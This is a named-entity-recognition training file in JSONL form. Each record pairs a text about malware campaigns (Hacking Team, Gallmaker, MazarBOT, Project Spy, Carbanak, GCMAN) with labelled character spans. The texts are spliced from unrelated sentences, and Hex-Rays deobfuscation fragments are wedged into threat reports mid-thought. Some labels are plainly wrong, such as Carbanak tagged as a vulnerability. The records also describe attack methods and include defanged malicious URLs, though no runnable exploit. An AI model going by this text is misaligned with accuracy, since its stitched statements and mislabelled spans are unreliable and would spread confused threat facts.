{"text": "July 11 Two new Flash zero-day vulnerabilities , CVE-2015-5122 and CVE-2015-5123 , were found in the hacking team dump . The hacking group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia . as the result was not correct in MMAT_CALLS ( detecting call arguments ) CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": [{"start": 16, "end": 46, "label": "Vulnerability"}, {"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 67, "end": 80, "label": "Vulnerability"}, {"start": 125, "end": 138, "label": "Organization"}, {"start": 147, "end": 160, "label": "System"}, {"start": 196, "end": 208, "label": "Organization"}, {"start": 220, "end": 242, "label": "Organization"}, {"start": 321, "end": 331, "label": "System"}, {"start": 361, "end": 393, "label": "Organization"}]}
{"text": "July 13 Further analysis of the hacking team dump revealed that the company used UEFI BIOS rootkit to keep their Remote Control System ( RCS ) agent installed in their targets \u2019 systems . If successful , Cobalt goes on to attack financial institutions outside the country . . A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": [{"start": 81, "end": 98, "label": "Malware"}, {"start": 113, "end": 142, "label": "Malware"}, {"start": 204, "end": 210, "label": "Organization"}, {"start": 229, "end": 251, "label": "Organization"}, {"start": 276, "end": 383, "label": "Indicator"}, {"start": 430, "end": 461, "label": "Organization"}, {"start": 473, "end": 572, "label": "Indicator"}, {"start": 590, "end": 598, "label": "Organization"}, {"start": 609, "end": 626, "label": "System"}]}
{"text": "July 14 A new zero-day vulnerability ( CVE-2015-2425 ) was found in Internet Explorer . The vulnerability was used to retrieve and execute Cobalt Strike from a remote server they controlled . However , DarkRace is a new ransomware group first discovered by researcher S!Ri .", "spans": [{"start": 14, "end": 36, "label": "Vulnerability"}, {"start": 39, "end": 52, "label": "Vulnerability"}, {"start": 68, "end": 85, "label": "System"}, {"start": 139, "end": 152, "label": "System"}, {"start": 202, "end": 210, "label": "Organization"}, {"start": 268, "end": 272, "label": "Organization"}]}
{"text": "July 16 On the mobile front , a fake news app designed to bypass Google Play was discovered . As part of our monitoring of Iranian threat agents activities , we have detected that since October 2016 and until the end of January 2017 , the Jerusalem Post , as well as multiple other Israeli websites and one website in the Palestinian Authority were compromised by Iranian threat agent CopyKittens . this did not work for functions with three or more dispatchers . However , not all insider threats are intentional , according to an Insider Threat Report from Crowd Research Partners .", "spans": [{"start": 65, "end": 76, "label": "System"}, {"start": 239, "end": 253, "label": "Organization"}, {"start": 322, "end": 343, "label": "Organization"}, {"start": 385, "end": 396, "label": "Organization"}, {"start": 559, "end": 582, "label": "Organization"}]}
{"text": "July 20 A new zero-day vulnerability ( CVE-2015-2426 ) was found in Windows , which Microsoft fixed in an out-of-band patch . CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date , and are analyzed in this report : TDTESS backdoor ; Vminst , a lateral movement tool ; NetSrv , a Cobalt Strike loader ; and ZPP , a files compression console program . Additionally , In early 2023 , KillMilk , the claimed founder of KillNet , attempted to ransom the purportedly stolen documents to NATO for 3 bitcoin , possibly in part to increase attention surrounding the activity .", "spans": [{"start": 14, "end": 36, "label": "Vulnerability"}, {"start": 39, "end": 52, "label": "Vulnerability"}, {"start": 68, "end": 75, "label": "System"}, {"start": 84, "end": 93, "label": "Organization"}, {"start": 126, "end": 137, "label": "Organization"}, {"start": 272, "end": 287, "label": "System"}, {"start": 290, "end": 296, "label": "System"}, {"start": 325, "end": 331, "label": "System"}, {"start": 336, "end": 356, "label": "System"}, {"start": 363, "end": 366, "label": "System"}, {"start": 472, "end": 479, "label": "Organization"}]}
{"text": "July 21 Analysis of the RCSAndroid spying tool revealed that Hacking Team can listen to calls and roots devices to get in . CopyKittens often uses the trial version of Cobalt Strike , a publicly available commercial software for \" Adversary Simulations and Red Team Operations \" . Hex-Rays kernel doesn\u2019t optimize some functions in MMAT_GLBOPT2 if it judges the optimization within the level is not required . To get in , the attacker used spear phishing emails with a self - extracting archive attachment pretending to be a voicemail .", "spans": [{"start": 24, "end": 34, "label": "Malware"}, {"start": 124, "end": 135, "label": "Organization"}, {"start": 168, "end": 181, "label": "System"}, {"start": 281, "end": 289, "label": "System"}, {"start": 332, "end": 344, "label": "System"}]}
{"text": "July 28 A recent campaign compromised Taiwan and Hong Kong sites to deliver Flash exploits related to Hacking Team . Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent . In this case , FULLHOUSE.DOORED is a backdoor written in C / C++ that communicates using HTTP .", "spans": [{"start": 76, "end": 81, "label": "System"}, {"start": 102, "end": 114, "label": "Organization"}, {"start": 148, "end": 159, "label": "Organization"}, {"start": 164, "end": 174, "label": "System"}, {"start": 297, "end": 305, "label": "System"}, {"start": 372, "end": 378, "label": "System"}, {"start": 383, "end": 393, "label": "System"}, {"start": 446, "end": 462, "label": "Malware"}, {"start": 466, "end": 524, "label": "Malware"}]}
{"text": "Android users warned of malware attack spreading via SMS FEB 16 , 2016 Security researchers are warning owners of Android smartphones about a new malware attack , spreading via SMS text messages . The group , which we have given the name Gallmaker , has been operating since at least December 2017 , with its most recent activity observed in June 2018 . the callback is executed just once in the implementation . The campaign was carried out in late 2020 , but it was detected , analyzed , and published in late March 2021 .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 114, "end": 121, "label": "System"}, {"start": 201, "end": 206, "label": "Organization"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 417, "end": 425, "label": "Organization"}]}
{"text": "As the team at Scandinavian security group CSIS describes , malware known as MazarBOT is being distributed via SMS in Denmark and is likely to also be encountered in other countries . Rather , the Gallmaker 's attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools . To handle multiple control flow dispatchers , In one case , certutil was used to decode multiple files related to credential theft .", "spans": [{"start": 43, "end": 47, "label": "Organization"}, {"start": 77, "end": 85, "label": "Malware"}, {"start": 197, "end": 206, "label": "Organization"}, {"start": 271, "end": 275, "label": "System"}, {"start": 288, "end": 317, "label": "System"}]}
{"text": "Victims \u2019 first encounter with the malware reportedly comes via an unsolicited text message that their Android smartphone receives . Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines . a callback for decompiler events was implemented . Most 51 are due to carelessness , negligence , or compromised credentials , but the potential impact is still present even in an unintentional scenario .", "spans": [{"start": 103, "end": 121, "label": "System"}, {"start": 133, "end": 142, "label": "Organization"}, {"start": 388, "end": 411, "label": "Vulnerability"}]}
{"text": "The txt message uses social engineering to dupe unsuspecting users into clicking on a link to a downloadable Android application . Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system . The code catches the \u201c hxe_prealloc \u201d The malware verifies that the server is authentic by downloading a signature file that is signed by the server and ensuring that it is the right one to make the operation more resilient to takedowns", "spans": [{"start": 109, "end": 116, "label": "System"}, {"start": 171, "end": 180, "label": "Organization"}, {"start": 206, "end": 218, "label": "System"}, {"start": 326, "end": 333, "label": "Malware"}]}
{"text": "CSIS provided a ( sanitised ) version of a typical message to warn users what to look out for : \u201c You have received a multimedia message from + [ country code ] [ sender number ] Follow the link http : //www.mmsforyou [ . Back in 2013 , CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz news , an Israeli newspaper . event ( according to Hex-Rays , The four - byte value at offset 0x416 ( 0x3e8 or decimal 1000 ) is the backdoor \u2019s version number .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 195, "end": 221, "label": "Indicator"}, {"start": 237, "end": 248, "label": "Organization"}, {"start": 262, "end": 270, "label": "Organization"}, {"start": 382, "end": 390, "label": "System"}, {"start": 393, "end": 492, "label": "Malware"}]}
{"text": "] net/mms.apk to view the message \u201d Once the APK package is downloaded , potential victims are urged to grant the malicious app a wide range of permissions on their Android device : App permissions SEND_SMS RECEIVE_BOOT_COMPLETED INTERNET SYSTEM_ALERT_WINDOW WRITE_SMS ACCESS_NETWORK_STATE WAKE_LOCK GET_TASKS CALL_PHONE RECEIVE_SMS READ_PHONE_STATE READ_SMS ERASE_PHONE Once installed , MazarBOT downloads a copy of Gallmaker 's activity appears to be highly targeted , with its victims all related to government , military , or defense sectors . this is the final event for optimizations ) If you want a good example , just look at the infection map for Flame it is tightly grouped around the Gulf States .", "spans": [{"start": 388, "end": 396, "label": "Malware"}, {"start": 417, "end": 426, "label": "Organization"}, {"start": 503, "end": 513, "label": "Organization"}, {"start": 516, "end": 524, "label": "Organization"}, {"start": 530, "end": 545, "label": "Organization"}, {"start": 656, "end": 661, "label": "Malware"}]}
{"text": "Tor onto users \u2019 Android smartphones and uses it to connect anonymously to the net before sending a text message containing the victim \u2019 s location to an Iranian mobile phone number . Gallmaker 's targets are embassies of an Eastern European country . then calls optblock_t : :f unc callback . The regex , and thus the rule , will match only the requests made to the endpoint of the Microsoft Exchange server .", "spans": [{"start": 0, "end": 3, "label": "System"}, {"start": 17, "end": 24, "label": "System"}, {"start": 184, "end": 193, "label": "Organization"}, {"start": 209, "end": 218, "label": "Organization"}, {"start": 257, "end": 282, "label": "System"}]}
{"text": "With the malware now in place , a number of actions can be performed , including allowing attackers to secretly monitor and control smartphones via a backdoor , send messages to premium-rate numbers , and intercept two-factor authentication codes sent by online banking apps and the like . There are no obvious links between the Eastern European and Middle Eastern targets , but it is clear that Gallmaker is specifically targeting the defense , military , and government sectors . Typically this event occurs a few times to several times , Honeypot Alerts Set up a honeypot mechanism to attract interest from adversaries .", "spans": [{"start": 396, "end": 405, "label": "Organization"}, {"start": 436, "end": 443, "label": "Organization"}, {"start": 446, "end": 454, "label": "Organization"}, {"start": 461, "end": 479, "label": "Organization"}, {"start": 541, "end": 556, "label": "Indicator"}]}
{"text": "In fact , with full access to the compromised Android smartphone , the opportunities for criminals to wreak havoc are significant \u2013 such as erasing infected phones or launching man-in-the-middle ( MITM ) attacks . The group has carried out attacks most months since December 2017 . so the callback can deobfuscate multiple control flow flattenings . Based on available information Mandiant has not been able to assess a general location that the group operates from .", "spans": [{"start": 46, "end": 64, "label": "System"}, {"start": 218, "end": 223, "label": "Organization"}, {"start": 381, "end": 389, "label": "Organization"}]}
{"text": "In its analysis , CSIS notes that MazarBOT was reported by Recorded Future last November as being actively sold in Russian underground forums and intriguingly , the malware will not activate on Android devices configured with Russian language settings . Its activity subsequently increased in the second quarter of 2018 , with a particular spike in April 2018 . Other additional modifications were made to the code ( e.g , writing a new algorithm for finding control flow dispatcher and first block , In the past , we have seen such occurrences with Magecart threat actors for example in the breach of the Umbro website .", "spans": [{"start": 18, "end": 22, "label": "Organization"}, {"start": 34, "end": 42, "label": "Malware"}, {"start": 59, "end": 74, "label": "Organization"}, {"start": 194, "end": 201, "label": "System"}, {"start": 550, "end": 572, "label": "Organization"}, {"start": 606, "end": 619, "label": "Organization"}]}
{"text": "This , in itself , does not prove that the perpetrators of the malware campaign are based in Russia , but it certainly sounds as if that is a strong possibility . The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect . validating a block comparison variable , The goal of this type of threat is often to shame or embarrass .", "spans": [{"start": 177, "end": 186, "label": "Organization"}, {"start": 218, "end": 222, "label": "System"}, {"start": 235, "end": 264, "label": "System"}]}
{"text": "Malware authors in the past have often coded a \u201c safety net \u201d into their malware to prevent them from accidentally infecting their own computers and devices . The Gamaredon Group primarily makes use of compromised domains , dynamic DNS providers , Russian and Ukrainian country code top-level domains ( ccTLDs ) , and Russian hosting providers to distribute their custom-built malware . and so on ) This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": [{"start": 163, "end": 178, "label": "Organization"}, {"start": 224, "end": 245, "label": "Organization"}, {"start": 326, "end": 343, "label": "Organization"}, {"start": 364, "end": 384, "label": "System"}, {"start": 440, "end": 478, "label": "Vulnerability"}]}
{"text": "For more detailed information about the threat , check out the blog post from CSIS . Gallmaker may well have continued to avoid detection were it not for Symantec 's technology . . Lastly , we emphasize that although the samples of COSMICENERGY we obtained are potentially red team related , threat actors regularly leverage contractors and red team tools in real world threat activity , including during OT attacks .", "spans": [{"start": 78, "end": 82, "label": "Organization"}, {"start": 85, "end": 94, "label": "Organization"}, {"start": 154, "end": 162, "label": "Organization"}, {"start": 232, "end": 244, "label": "Malware"}, {"start": 273, "end": 281, "label": "Organization"}, {"start": 292, "end": 305, "label": "Organization"}, {"start": 341, "end": 355, "label": "System"}]}
{"text": "And , of course , remember to always be wary of unsolicited , unusual text messages and installing apps from third-party sources on your Android smartphone . In this instance , Symantec identified the specific PowerShell commands used by Gallmaker as being suspicious , leading to the discovery of this new campaign . After the modification , Akamai notes that they identified multiple compromised websites that had similarities .", "spans": [{"start": 137, "end": 155, "label": "System"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 210, "end": 229, "label": "System"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 343, "end": 349, "label": "Organization"}]}
{"text": "Coronavirus Update App Leads to Project Spy Android and iOS Spyware We discovered a cyberespionage campaign we have named Project Spy infecting Android and iOS devices with spyware by using the coronavirus disease ( Covid-19 ) as a lure . Without Symantec 's advanced AI-based capabilities , Gallmaker 's activities may well have remained undetected . for example , Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": [{"start": 0, "end": 22, "label": "System"}, {"start": 32, "end": 43, "label": "Malware"}, {"start": 44, "end": 51, "label": "System"}, {"start": 56, "end": 59, "label": "System"}, {"start": 122, "end": 133, "label": "Malware"}, {"start": 144, "end": 151, "label": "System"}, {"start": 156, "end": 159, "label": "System"}, {"start": 247, "end": 255, "label": "Organization"}, {"start": 292, "end": 301, "label": "Organization"}, {"start": 366, "end": 377, "label": "Organization"}, {"start": 514, "end": 530, "label": "System"}, {"start": 584, "end": 597, "label": "System"}]}
{"text": "By : Tony Bao , Junzhi Lu April 14 , 2020 We discovered a potential cyberespionage campaign , which we have named Project Spy , that infects Android and iOS devices with spyware ( detected by Trend Micro as AndroidOS_ProjectSpy.HRX and IOS_ProjectSpy.A , respectively ) . Previously , LookingGlass reported on a campaign they named \" Operation Armageddon \" , targeting individuals involved in the Ukrainian military and national security establishment . the following functions with multiple control flow dispatchers can be unflattened . A New Threat on the Horizon : CL0P", "spans": [{"start": 114, "end": 125, "label": "Malware"}, {"start": 141, "end": 148, "label": "System"}, {"start": 153, "end": 156, "label": "System"}, {"start": 192, "end": 203, "label": "Organization"}, {"start": 207, "end": 231, "label": "Indicator"}, {"start": 236, "end": 252, "label": "Indicator"}, {"start": 285, "end": 297, "label": "Organization"}, {"start": 407, "end": 415, "label": "Organization"}, {"start": 568, "end": 572, "label": "Organization"}]}
{"text": "Project Spy uses the ongoing coronavirus pandemic as a lure , posing as an app called Coronavirus Updates . The earliest discovered sample ( based on compile times and sandbox submission times ) distributed by this threat group resembles the descriptions of Gamaredon provided by Symantec and Trend Micro . The original implementation supports the following two cases of flattened blocks to find a block comparison variable for the next block ( the cases are then simplified ) One interesting detail about Hack520 is his apparent love for pigs , as seen in his use of the word in his email addresses .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 215, "end": 227, "label": "Organization"}, {"start": 258, "end": 267, "label": "Organization"}, {"start": 280, "end": 288, "label": "Organization"}, {"start": 293, "end": 304, "label": "Organization"}, {"start": 506, "end": 513, "label": "Organization"}]}
{"text": "We also found similarities in two older samples disguised as a Google service and , subsequently , as a music app after further investigation . The scripts would also use wget to send POST requests to command and control ( C2 ) servers that would contain information about the compromised system . . Limited forensic evidence existed to determine exactly how TIEDYE was deployed to systems in the victim environment ; however , like STRATOFEAR , TIEDYE was likely deployed as a second - stage backdoor by FULLHOUSE.DOORED .", "spans": [{"start": 63, "end": 69, "label": "Organization"}, {"start": 171, "end": 175, "label": "System"}, {"start": 179, "end": 197, "label": "Malware"}, {"start": 247, "end": 266, "label": "Malware"}, {"start": 359, "end": 365, "label": "Malware"}, {"start": 433, "end": 443, "label": "Malware"}, {"start": 446, "end": 452, "label": "Malware"}, {"start": 464, "end": 523, "label": "Malware"}]}
{"text": "However , we have noted a significantly small number of downloads of the app in Pakistan , India , Afghanistan , Bangladesh , Iran , Saudi Arabia , Austria , Romania , Grenada , and Russia . These VNC exectuables would either be included in the SFX file or downloaded by the batch script . In the second case , While Mandiant was unable to determine the initial intrusion point , our analysis suggests the OT component of this attack may have been developed in as little as two months .", "spans": [{"start": 197, "end": 200, "label": "System"}, {"start": 317, "end": 325, "label": "Organization"}, {"start": 406, "end": 418, "label": "System"}]}
{"text": "Project Spy routine At the end of March 2020 , we came across an app masquerading as a coronavirus update app , which we named Project Spy based on the login page of its backend server . The batch script would then attempt to have the VNC program connect to a command and control ( C2 ) server to enable the server to control the compromised system . block comparison variable is searched in each block of endsWithJcc and nonJcc . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 127, "end": 138, "label": "Malware"}, {"start": 235, "end": 238, "label": "System"}, {"start": 247, "end": 279, "label": "Malware"}, {"start": 406, "end": 417, "label": "System"}, {"start": 422, "end": 428, "label": "System"}, {"start": 465, "end": 470, "label": "Organization"}, {"start": 486, "end": 500, "label": "System"}]}
{"text": "This app carries a number of the capabilities : Upload GSM , WhatsApp , Telegram , Facebook , and Threema messages Upload voice notes , contacts stored , accounts , call logs , location information , and images Upload the expanded list of collected device information ( e.g. , IMEI , product , board , manufacturer , tag , host , Android version , application version , name , model brand , user , serial , hardware , bootloader , and device ID ) Upload SIM information ( e.g. While the most recent samples observed still use batch scripts and SFX files , the Gamaredon Group has moved away from applications like wget , Remote Manipulator Tool , VNC and ChkFlsh.exe . If the next block is resolved , The overlaps in targeting and sharing of infrastructure amongst DPRK groups highlights the continued targeting and coordinated interest in the cryptocurrency field .", "spans": [{"start": 55, "end": 58, "label": "System"}, {"start": 61, "end": 69, "label": "System"}, {"start": 72, "end": 80, "label": "System"}, {"start": 83, "end": 91, "label": "System"}, {"start": 98, "end": 105, "label": "System"}, {"start": 330, "end": 337, "label": "System"}, {"start": 526, "end": 539, "label": "System"}, {"start": 544, "end": 553, "label": "System"}, {"start": 560, "end": 575, "label": "Organization"}, {"start": 614, "end": 618, "label": "System"}, {"start": 621, "end": 644, "label": "System"}, {"start": 647, "end": 650, "label": "System"}, {"start": 655, "end": 666, "label": "System"}, {"start": 765, "end": 776, "label": "Organization"}]}
{"text": ", IMSI , operator code , country , MCC-mobile country , SIM serial , operator name , and mobile number ) Upload wifi information ( e.g. , SSID , wifi speed , and MAC address ) Upload other information ( e.g. , display , date , time , fingerprint , created at , and updated at ) The app is capable of stealing messages from popular messaging apps by abusing the notification permissions to read the notification content and saving it to the database . The threat group using these implants has been active since at least 2014 and has been seen targeting individuals likely involved in the Ukrainian government . the CFG ( specifically mblock_t : :p redset and mblock_t : :s uccset ) An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 ( update 1 ) , as exploited in the wild starting in December 2021 .", "spans": [{"start": 455, "end": 467, "label": "Organization"}, {"start": 598, "end": 608, "label": "Organization"}, {"start": 634, "end": 654, "label": "System"}, {"start": 659, "end": 679, "label": "System"}, {"start": 685, "end": 729, "label": "Vulnerability"}, {"start": 733, "end": 765, "label": "System"}]}
{"text": "It requests permission to access the additional storage . Some of the samples share delivery mechanisms and infrastructure with samples which are detected by a few antivirus vendors as Gamaredon . and the destination of goto jump instruction are updated . Symantec has identified MuddyWater as responsible for a new cyberespionage campaign targeting telecommunication and IT service providers in Asia and the Middle East for over six months .", "spans": [{"start": 185, "end": 194, "label": "Organization"}, {"start": 256, "end": 264, "label": "Organization"}, {"start": 280, "end": 290, "label": "Organization"}, {"start": 312, "end": 339, "label": "Organization"}, {"start": 350, "end": 392, "label": "Organization"}]}
{"text": "Project Spy \u2019 s earlier versions Searching for the domain in our sample database , we found that the coronavirus update app appears to be the latest version of another sample that we detected in May 2019 . Periodically , researchers at Palo Alto Networks hunt through WildFire execution reports , using AutoFocus , to identify untagged samples ' artifacts in the hopes of identifying previously undiscovered malware families , behaviors , and campaigns . The code tracks the block comparison variable in each predecessor and more ( if any conditional blocks before the predecessor ) When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users , the company \u2019s then - CEO Noel Biderman was quick to point the finger at an unnamed former contractor .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 236, "end": 254, "label": "Organization"}, {"start": 268, "end": 276, "label": "Organization"}, {"start": 619, "end": 636, "label": "Organization"}, {"start": 761, "end": 774, "label": "Organization"}, {"start": 811, "end": 836, "label": "Organization"}]}
{"text": "The first version of Project Spy ( detected by Trend Micro as AndroidOS_SpyAgent.HRXB ) had the following capabilities : Collect device and system information ( i.e. , IMEI , device ID , manufacturer , model and phone number ) , location information , contacts stored , and call logs Collect and send SMS Take pictures via the camera Upload recorded MP4 files Monitor calls Searching further , we also found another sample that could be the second version of Project Spy . Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . to identify each next block for unflattening . In those instances , the malicious was actually embedded in the Google Tag Manager library itself , which is very clever and difficult to detect .", "spans": [{"start": 21, "end": 32, "label": "Malware"}, {"start": 47, "end": 58, "label": "Organization"}, {"start": 62, "end": 85, "label": "Indicator"}, {"start": 548, "end": 556, "label": "Vulnerability"}, {"start": 561, "end": 580, "label": "Organization"}, {"start": 682, "end": 704, "label": "Organization"}]}
{"text": "This version appeared as Wabi Music , and copied a popular video-sharing social networking service as its backend login page . Today at the Security Analyst Summit ( SAS 2016 ) , Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies \u2013 Metel and GCMAN \u2013 and the reemergence of the Carbanak group with new targets in its sights . And , While one of his signatures uses his own blog domain , there is also a second signature which uses 93[.]gd , a domain that was found to have been actively selling VPS services in the past .", "spans": [{"start": 179, "end": 192, "label": "Organization"}, {"start": 259, "end": 263, "label": "Organization"}, {"start": 276, "end": 281, "label": "Organization"}, {"start": 286, "end": 291, "label": "Organization"}, {"start": 321, "end": 335, "label": "Organization"}, {"start": 474, "end": 481, "label": "Indicator"}]}
{"text": "In this second version , the developer \u2019 s name listed was \u201c concipit1248 \u201d in Google Play , and may have been active between May 2019 to February 2020 . In 2015 , Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups . in the third case that was implemented , Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": [{"start": 79, "end": 90, "label": "System"}, {"start": 164, "end": 177, "label": "Organization"}, {"start": 285, "end": 291, "label": "Organization"}, {"start": 453, "end": 469, "label": "Vulnerability"}]}
{"text": "This app appears to have become unavailable on Google Play in March 2020 . Kaspersky Lab is releasing crucial Indicators of Compromise ( IOCs ) and other data to help organizations search for traces of these attack groups in their corporate networks . the block comparison variables are not assigned in the flattened blocks but rather the first blocks according to a condition . Geographically , most victims are located in Europe , specifically Italy .", "spans": [{"start": 47, "end": 58, "label": "System"}, {"start": 75, "end": 88, "label": "Organization"}, {"start": 208, "end": 221, "label": "Organization"}]}
{"text": "The second Project Spy version has similar capabilities to the first version , with the addition of the following : Stealing notification messages sent from WhatsApp , Facebook , and Telegram Abandoning the FTP mode of uploading the recorded images Aside from changing the app \u2019 s supposed function and look , the second and third versions \u2019 codes had little differences . In all , Kaspersky Lab discovered Metel in more than 30 financial institutions . For example , According to Kaspersky telemetry , targeted organizations included think tanks and individuals working in various areas related to security and geopolitics .", "spans": [{"start": 11, "end": 22, "label": "Malware"}, {"start": 157, "end": 165, "label": "System"}, {"start": 168, "end": 176, "label": "System"}, {"start": 183, "end": 191, "label": "System"}, {"start": 382, "end": 395, "label": "Organization"}, {"start": 407, "end": 412, "label": "Organization"}, {"start": 429, "end": 451, "label": "Organization"}, {"start": 481, "end": 490, "label": "Organization"}, {"start": 535, "end": 546, "label": "Organization"}, {"start": 551, "end": 623, "label": "Organization"}]}
{"text": "Potentially malicious iOS connection Using the codes and \u201c Concipit1248 \u201d to check for more versions , we found two other apps in the App Store . It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware . the following microcode graph shows edi is assigned to esi ( the block comparison variable in this case ) Rhysida appears to have first popped up back in May , with several high - profile compromises posted on their leak site .", "spans": [{"start": 22, "end": 25, "label": "System"}, {"start": 134, "end": 143, "label": "System"}, {"start": 218, "end": 240, "label": "Organization"}, {"start": 298, "end": 311, "label": "System"}, {"start": 420, "end": 427, "label": "Malware"}]}
{"text": "Further analysis of the iOS app \u201c Concipit1248 \u201d showed that the server used , spy [ . A second group , which we call GCMAN because the malware is based on code compiled on the GCC compiler , emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services . in block number 7 but the edi value is assigned in block number 1 and 2 . As we \u2019ve already previously discussed in our 2017 predictions , these groups will constantly evolve and employ unique and advanced attack techniques .", "spans": [{"start": 79, "end": 86, "label": "Indicator"}, {"start": 96, "end": 101, "label": "Organization"}, {"start": 118, "end": 123, "label": "Organization"}, {"start": 241, "end": 252, "label": "Organization"}, {"start": 263, "end": 283, "label": "Organization"}]}
{"text": "] cashnow [ . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks . If the immediate value for block comparison variable is not found in the flattened blocks , Threat intelligence is simply information about threats .", "spans": [{"start": 51, "end": 60, "label": "Organization"}, {"start": 149, "end": 154, "label": "Organization"}, {"start": 249, "end": 268, "label": "Organization"}]}
{"text": "] ee , is the same one used in the Android version of Project Spy . Once inside the network , the GCMAN group uses legitimate and penetration testing tools such as Putty , VNC , and Meterpreter for lateral movement . the new code tries to trace the first blocks to obtain the value and reconnects block number 1 and 2 as successors of block number 7 , They collect , process , and analyze data about cyberthreats from a variety of public and private sources , creating timely , actionable , and engaging intelligence to keep organizations and our global partners up - to - date about today \u2019s threat landscape .", "spans": [{"start": 35, "end": 42, "label": "System"}, {"start": 54, "end": 65, "label": "System"}, {"start": 98, "end": 109, "label": "Organization"}, {"start": 164, "end": 169, "label": "System"}, {"start": 172, "end": 175, "label": "System"}, {"start": 182, "end": 193, "label": "System"}]}
{"text": "However , although the \u201c Concipit1248 \u201d app requested permissions to open the device camera and read photos , the code only can upload a self-contained PNG file to a remote sever . Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute . in addition to normal operations mentioned in the original cases . It is attributed to Iranian statesponsored APT Charming Kitten , whose other recent attacks include targeting world leaders attending the Munich Security Conference and the T20 Summit in Saudi Arabia in an effort to steal their email credentials , targeting Israeli scholars and U.S. government employees in another credentialstealing effort last July , and also attacking the reelection effort of former President Donald Trump .", "spans": [{"start": 228, "end": 239, "label": "Organization"}, {"start": 272, "end": 276, "label": "Organization"}, {"start": 440, "end": 482, "label": "Organization"}, {"start": 530, "end": 603, "label": "Organization"}, {"start": 678, "end": 694, "label": "Organization"}, {"start": 699, "end": 724, "label": "Organization"}]}
{"text": "This may imply the \u201c Concipit1248 \u201d app is still incubating . The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out . In this case , When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users , the company \u2019s then - CEO Noel Biderman was quick to point the finger at an unnamed former contractor .", "spans": [{"start": 66, "end": 77, "label": "Organization"}, {"start": 144, "end": 148, "label": "Organization"}, {"start": 290, "end": 307, "label": "Organization"}, {"start": 432, "end": 445, "label": "Organization"}, {"start": 482, "end": 507, "label": "Organization"}]}
{"text": "The other iOS app \u201c Concipit Shop \u201d from the same developer appeared normal and was last updated on November 2019 . During that time they poked 70 internal hosts , compromised 56 accounts , making their way from 139 attack sources ( TOR and compromised home routers ) . the code parses the structure in first blocks then reconnects each conditional blocks under the flattened blocks ( #1 and #2 as successors of #13 , There are three main subroutines : the first is launched when the document is opened ( e.g. , Auto_Open , Workbook_Open ) , the second creates a randomly named dynamic loading library ( DLL ) file in the user \u2019s temporary files folder , and the third creates a randomly named shortcut ( LNK ) file which contains code to run regsvr32.exe ( or rundll32.exe ) to launch the next stage .", "spans": [{"start": 10, "end": 13, "label": "System"}, {"start": 457, "end": 537, "label": "Indicator"}, {"start": 553, "end": 652, "label": "Indicator"}, {"start": 679, "end": 775, "label": "Indicator"}]}
{"text": "Apple has confirmed that the iOS apps are not functioning based on analysis of the codes , and stated that the sandbox is able to detect and block these malicious behaviors . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . #3 and #4 as successors of #11 ) While a sudden dip in attacks is n't too unusual for top ransomware gangs , it 's worth mentioning that in last month \u2019s review we speculated that Royal might be going through a rebrand .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 29, "end": 32, "label": "System"}, {"start": 225, "end": 229, "label": "Organization"}, {"start": 263, "end": 271, "label": "Vulnerability"}, {"start": 301, "end": 310, "label": "Organization"}, {"start": 493, "end": 498, "label": "Organization"}]}
